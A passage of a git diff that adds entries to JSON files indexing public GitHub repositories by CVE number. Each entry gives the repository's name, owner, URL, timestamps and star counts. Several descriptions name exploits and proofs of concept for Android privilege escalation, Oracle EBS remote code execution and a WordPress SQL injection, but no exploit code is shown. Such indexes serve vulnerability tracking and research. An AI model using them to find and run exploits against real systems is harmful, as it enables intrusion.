+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 665620716,
"name": "F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study",
diff --git a/2022/CVE-2022-1471.json b/2022/CVE-2022-1471.json
index 45d4071658..132859a7ab 100644
--- a/2022/CVE-2022-1471.json
+++ b/2022/CVE-2022-1471.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 608740009,
+ "name": "SnakeYAML-CVE-2022-1471-POC",
+ "full_name": "1fabunicorn\/SnakeYAML-CVE-2022-1471-POC",
+ "owner": {
+ "login": "1fabunicorn",
+ "id": 19752126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19752126?v=4",
+ "html_url": "https:\/\/github.com\/1fabunicorn"
+ },
+ "html_url": "https:\/\/github.com\/1fabunicorn\/SnakeYAML-CVE-2022-1471-POC",
+ "description": "Code for veracode blog",
+ "fork": false,
+ "created_at": "2023-03-02T16:33:02Z",
+ "updated_at": "2024-04-04T20:53:55Z",
+ "pushed_at": "2023-03-02T16:50:59Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 637852784,
"name": "snakeyaml_cve_poc",
diff --git a/2022/CVE-2022-1609.json b/2022/CVE-2022-1609.json
index dca9887d10..9f7db88664 100644
--- a/2022/CVE-2022-1609.json
+++ b/2022/CVE-2022-1609.json
@@ -88,5 +88,35 @@
"watchers": 3,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 631257182,
+ "name": "cve-2022-1609-exploit",
+ "full_name": "w4r3s\/cve-2022-1609-exploit",
+ "owner": {
+ "login": "w4r3s",
+ "id": 119853210,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119853210?v=4",
+ "html_url": "https:\/\/github.com\/w4r3s"
+ },
+ "html_url": "https:\/\/github.com\/w4r3s\/cve-2022-1609-exploit",
+ "description": "Exploit for CVE-2022-1609 WordPress Weblizar Backdoor.",
+ "fork": false,
+ "created_at": "2023-04-22T12:51:09Z",
+ "updated_at": "2023-07-05T12:08:37Z",
+ "pushed_at": "2023-04-22T12:51:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-20224.json b/2022/CVE-2022-20224.json
index e858a9526e..b5d4a1c50a 100644
--- a/2022/CVE-2022-20224.json
+++ b/2022/CVE-2022-20224.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 624387380,
+ "name": "platform_system_bt_AOSP10_r33_CVE-2022-20224",
+ "full_name": "hshivhare67\/platform_system_bt_AOSP10_r33_CVE-2022-20224",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_system_bt_AOSP10_r33_CVE-2022-20224",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T11:02:47Z",
+ "updated_at": "2023-04-06T11:08:20Z",
+ "pushed_at": "2023-04-06T11:09:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-20347.json b/2022/CVE-2022-20347.json
index df63166cd0..2b2394ed2f 100644
--- a/2022/CVE-2022-20347.json
+++ b/2022/CVE-2022-20347.json
@@ -58,5 +58,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 624363447,
+ "name": "platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347",
+ "full_name": "hshivhare67\/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T09:54:28Z",
+ "updated_at": "2023-04-06T10:32:43Z",
+ "pushed_at": "2023-04-07T03:29:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-20360.json b/2022/CVE-2022-20360.json
new file mode 100644
index 0000000000..b8e406b6d4
--- /dev/null
+++ b/2022/CVE-2022-20360.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 645233752,
+ "name": "packages_apps_Settings_AOSP_10_r33_CVE-2022-20360",
+ "full_name": "726232111\/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360",
+ "owner": {
+ "login": "726232111",
+ "id": 34729943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34729943?v=4",
+ "html_url": "https:\/\/github.com\/726232111"
+ },
+ "html_url": "https:\/\/github.com\/726232111\/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-25T07:56:24Z",
+ "updated_at": "2023-05-25T07:56:24Z",
+ "pushed_at": "2022-09-09T07:35:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20413.json b/2022/CVE-2022-20413.json
new file mode 100644
index 0000000000..741efe7475
--- /dev/null
+++ b/2022/CVE-2022-20413.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 589955117,
+ "name": "frameworks_av-r33_CVE-2022-20413",
+ "full_name": "pazhanivel07\/frameworks_av-r33_CVE-2022-20413",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_av-r33_CVE-2022-20413",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-17T10:33:22Z",
+ "updated_at": "2023-03-23T01:13:28Z",
+ "pushed_at": "2023-01-17T11:20:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20421.json b/2022/CVE-2022-20421.json
new file mode 100644
index 0000000000..083bea797f
--- /dev/null
+++ b/2022/CVE-2022-20421.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 617890338,
+ "name": "badspin",
+ "full_name": "0xkol\/badspin",
+ "owner": {
+ "login": "0xkol",
+ "id": 58270928,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58270928?v=4",
+ "html_url": "https:\/\/github.com\/0xkol"
+ },
+ "html_url": "https:\/\/github.com\/0xkol\/badspin",
+ "description": "Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)",
+ "fork": false,
+ "created_at": "2023-03-23T10:25:59Z",
+ "updated_at": "2024-06-21T00:10:56Z",
+ "pushed_at": "2023-05-27T15:39:41Z",
+ "stargazers_count": 222,
+ "watchers_count": 222,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 222,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20452.json b/2022/CVE-2022-20452.json
new file mode 100644
index 0000000000..1f857fc75a
--- /dev/null
+++ b/2022/CVE-2022-20452.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 587387036,
+ "name": "LeakValue",
+ "full_name": "michalbednarski\/LeakValue",
+ "owner": {
+ "login": "michalbednarski",
+ "id": 1826899,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4",
+ "html_url": "https:\/\/github.com\/michalbednarski"
+ },
+ "html_url": "https:\/\/github.com\/michalbednarski\/LeakValue",
+ "description": "Exploit for CVE-2022-20452, privilege escalation on Android from installed app to system app (or another app) via LazyValue using Parcel after recycle()",
+ "fork": false,
+ "created_at": "2023-01-10T16:24:51Z",
+ "updated_at": "2024-06-13T03:39:03Z",
+ "pushed_at": "2023-04-12T17:28:49Z",
+ "stargazers_count": 264,
+ "watchers_count": 264,
+ "has_discussions": false,
+ "forks_count": 50,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 50,
+ "watchers": 264,
+ "score": 0,
+ "subscribers_count": 9
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20456.json b/2022/CVE-2022-20456.json
new file mode 100644
index 0000000000..f90ba92764
--- /dev/null
+++ b/2022/CVE-2022-20456.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 647688194,
+ "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20456",
+ "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20456",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20456",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-31T10:07:10Z",
+ "updated_at": "2023-05-31T10:15:36Z",
+ "pushed_at": "2023-05-31T10:13:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20470.json b/2022/CVE-2022-20470.json
new file mode 100644
index 0000000000..b99307c967
--- /dev/null
+++ b/2022/CVE-2022-20470.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 584611982,
+ "name": "frameworks_base_AOSP10_r33_CVE-2022-20470",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20470",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20470",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-03T03:54:59Z",
+ "updated_at": "2023-03-27T01:47:22Z",
+ "pushed_at": "2023-01-03T04:01:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20473.json b/2022/CVE-2022-20473.json
new file mode 100644
index 0000000000..d07e8774e9
--- /dev/null
+++ b/2022/CVE-2022-20473.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 584289667,
+ "name": "frameworks_minikin_AOSP10_r33_CVE-2022-20473",
+ "full_name": "Trinadh465\/frameworks_minikin_AOSP10_r33_CVE-2022-20473",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_minikin_AOSP10_r33_CVE-2022-20473",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-02T05:55:37Z",
+ "updated_at": "2023-01-02T05:55:37Z",
+ "pushed_at": null,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 584624006,
+ "name": "frameworks_minikin_AOSP10_r33-CVE-2022-20473",
+ "full_name": "Trinadh465\/frameworks_minikin_AOSP10_r33-CVE-2022-20473",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_minikin_AOSP10_r33-CVE-2022-20473",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-03T04:51:12Z",
+ "updated_at": "2023-01-03T04:53:10Z",
+ "pushed_at": "2023-01-03T04:53:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20489.json b/2022/CVE-2022-20489.json
new file mode 100644
index 0000000000..07d67050a8
--- /dev/null
+++ b/2022/CVE-2022-20489.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 647715589,
+ "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old",
+ "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-31T11:22:01Z",
+ "updated_at": "2023-05-31T11:56:29Z",
+ "pushed_at": "2023-05-31T11:55:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 647728712,
+ "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20489",
+ "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-31T11:56:48Z",
+ "updated_at": "2023-05-31T12:05:37Z",
+ "pushed_at": "2023-05-31T12:03:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20490.json b/2022/CVE-2022-20490.json
new file mode 100644
index 0000000000..45b4ababf8
--- /dev/null
+++ b/2022/CVE-2022-20490.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 647702001,
+ "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20490",
+ "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20490",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20490",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-31T10:45:35Z",
+ "updated_at": "2023-05-31T10:52:34Z",
+ "pushed_at": "2023-05-31T10:51:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20492.json b/2022/CVE-2022-20492.json
new file mode 100644
index 0000000000..08097ca31c
--- /dev/null
+++ b/2022/CVE-2022-20492.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 647620143,
+ "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20492",
+ "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20492",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20492",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-31T07:07:40Z",
+ "updated_at": "2023-05-31T07:12:57Z",
+ "pushed_at": "2023-05-31T09:59:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20493.json b/2022/CVE-2022-20493.json
new file mode 100644
index 0000000000..94a0c609b1
--- /dev/null
+++ b/2022/CVE-2022-20493.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 647669098,
+ "name": "frameworks_base_CVE-2022-20493",
+ "full_name": "Trinadh465\/frameworks_base_CVE-2022-20493",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2022-20493",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-31T09:18:01Z",
+ "updated_at": "2023-05-31T09:25:13Z",
+ "pushed_at": "2023-05-31T09:24:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20494.json b/2022/CVE-2022-20494.json
new file mode 100644
index 0000000000..5aa7957c42
--- /dev/null
+++ b/2022/CVE-2022-20494.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 609257730,
+ "name": "CVE-2022-20494",
+ "full_name": "Supersonic\/CVE-2022-20494",
+ "owner": {
+ "login": "Supersonic",
+ "id": 36431699,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36431699?v=4",
+ "html_url": "https:\/\/github.com\/Supersonic"
+ },
+ "html_url": "https:\/\/github.com\/Supersonic\/CVE-2022-20494",
+ "description": "Exploit app for CVE-2022-20494, a high severity permanent denial-of-service vulnerability that leverages Android's DND (Do not disturb) feature",
+ "fork": false,
+ "created_at": "2023-03-03T17:54:34Z",
+ "updated_at": "2024-01-16T16:23:26Z",
+ "pushed_at": "2023-03-03T18:11:07Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-20607.json b/2022/CVE-2022-20607.json
new file mode 100644
index 0000000000..d2dcf02c66
--- /dev/null
+++ b/2022/CVE-2022-20607.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 598379401,
+ "name": "CVE-2022-20607",
+ "full_name": "sumeetIT\/CVE-2022-20607",
+ "owner": {
+ "login": "sumeetIT",
+ "id": 54736912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54736912?v=4",
+ "html_url": "https:\/\/github.com\/sumeetIT"
+ },
+ "html_url": "https:\/\/github.com\/sumeetIT\/CVE-2022-20607",
+ "description": "In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N\/A CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-02-07T01:28:29Z",
+ "updated_at": "2023-02-20T12:01:39Z",
+ "pushed_at": "2022-12-27T12:10:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-2078.json b/2022/CVE-2022-2078.json
new file mode 100644
index 0000000000..70dbdbba03
--- /dev/null
+++ b/2022/CVE-2022-2078.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 610271448,
+ "name": "CVE-2022-2078",
+ "full_name": "delsploit\/CVE-2022-2078",
+ "owner": {
+ "login": "delsploit",
+ "id": 127108998,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4",
+ "html_url": "https:\/\/github.com\/delsploit"
+ },
+ "html_url": "https:\/\/github.com\/delsploit\/CVE-2022-2078",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-06T12:49:29Z",
+ "updated_at": "2023-08-07T10:26:59Z",
+ "pushed_at": "2023-03-06T12:50:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-21306.json b/2022/CVE-2022-21306.json
new file mode 100644
index 0000000000..e4ff85909f
--- /dev/null
+++ b/2022/CVE-2022-21306.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 624702558,
+ "name": "CVE-2022-21306",
+ "full_name": "hktalent\/CVE-2022-21306",
+ "owner": {
+ "login": "hktalent",
+ "id": 18223385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4",
+ "html_url": "https:\/\/github.com\/hktalent"
+ },
+ "html_url": "https:\/\/github.com\/hktalent\/CVE-2022-21306",
+ "description": "POC,EXP,chatGPT for me,只能给一些思路,全部不可用",
+ "fork": false,
+ "created_at": "2023-04-07T03:59:07Z",
+ "updated_at": "2023-04-07T03:59:43Z",
+ "pushed_at": "2023-04-07T03:59:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-21587.json b/2022/CVE-2022-21587.json
new file mode 100644
index 0000000000..b4b0c21aed
--- /dev/null
+++ b/2022/CVE-2022-21587.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 597954094,
+ "name": "CVE-2022-21587-POC",
+ "full_name": "hieuminhnv\/CVE-2022-21587-POC",
+ "owner": {
+ "login": "hieuminhnv",
+ "id": 28292732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28292732?v=4",
+ "html_url": "https:\/\/github.com\/hieuminhnv"
+ },
+ "html_url": "https:\/\/github.com\/hieuminhnv\/CVE-2022-21587-POC",
+ "description": "CVE-2022-21587 POC ",
+ "fork": false,
+ "created_at": "2023-02-06T04:18:24Z",
+ "updated_at": "2023-05-06T15:24:03Z",
+ "pushed_at": "2023-02-17T09:22:41Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 604991320,
+ "name": "Oracle-E-BS-CVE-2022-21587-Exploit",
+ "full_name": "rockmelodies\/Oracle-E-BS-CVE-2022-21587-Exploit",
+ "owner": {
+ "login": "rockmelodies",
+ "id": 24653177,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4",
+ "html_url": "https:\/\/github.com\/rockmelodies"
+ },
+ "html_url": "https:\/\/github.com\/rockmelodies\/Oracle-E-BS-CVE-2022-21587-Exploit",
+ "description": "Oracle E-BS CVE-2022-21587 Exploit",
+ "fork": false,
+ "created_at": "2023-02-22T08:00:38Z",
+ "updated_at": "2023-02-14T03:09:51Z",
+ "pushed_at": "2023-02-14T03:46:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 609134090,
+ "name": "CVE-2022-21587-Oracle-EBS-",
+ "full_name": "sahabrifki\/CVE-2022-21587-Oracle-EBS-",
+ "owner": {
+ "login": "sahabrifki",
+ "id": 26023743,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26023743?v=4",
+ "html_url": "https:\/\/github.com\/sahabrifki"
+ },
+ "html_url": "https:\/\/github.com\/sahabrifki\/CVE-2022-21587-Oracle-EBS-",
+ "description": "This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)",
+ "fork": false,
+ "created_at": "2023-03-03T12:56:58Z",
+ "updated_at": "2023-10-12T09:14:41Z",
+ "pushed_at": "2023-03-03T13:12:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-21661.json b/2022/CVE-2022-21661.json
index 118a7ba744..28a970ec3e 100644
--- a/2022/CVE-2022-21661.json
+++ b/2022/CVE-2022-21661.json
@@ -214,6 +214,66 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 598931701,
+ "name": "CVE-2022-21661-Demo",
+ "full_name": "daniel616\/CVE-2022-21661-Demo",
+ "owner": {
+ "login": "daniel616",
+ "id": 26915500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26915500?v=4",
+ "html_url": "https:\/\/github.com\/daniel616"
+ },
+ "html_url": "https:\/\/github.com\/daniel616\/CVE-2022-21661-Demo",
+ "description": "Demonstration of the SQL injection vulnerability in wordpress 5.8.2",
+ "fork": false,
